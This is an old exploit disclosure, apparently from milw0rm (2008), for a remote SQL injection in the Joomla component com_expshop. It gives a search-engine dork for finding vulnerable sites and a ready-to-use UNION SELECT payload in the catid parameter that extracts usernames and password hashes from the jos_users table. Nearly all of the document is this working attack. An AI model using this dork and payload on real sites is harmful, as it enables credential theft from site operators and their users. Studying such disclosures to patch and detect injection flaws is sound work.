21 lines
864 B
Text
Executable file
21 lines
864 B
Text
Executable file
/---------------------------------------------------------------\
|
|
\ /
|
|
/ Joomla Component expshop Remote SQL injection \
|
|
\ /
|
|
\---------------------------------------------------------------/
|
|
|
|
|
|
[*] Author : His0k4 [ALGERIAN HaCkEr]
|
|
|
|
[*] Dork : inurl:com_expshop
|
|
|
|
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid={SQL}
|
|
|
|
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users--
|
|
|
|
|
|
----------------------------------------------------------------------------
|
|
[*] Greetings : All friends & muslims HaCkeRs...
|
|
[*] Greetings2: http://palcastle.org/cc
|
|
|
|
# milw0rm.com [2008-06-22]
|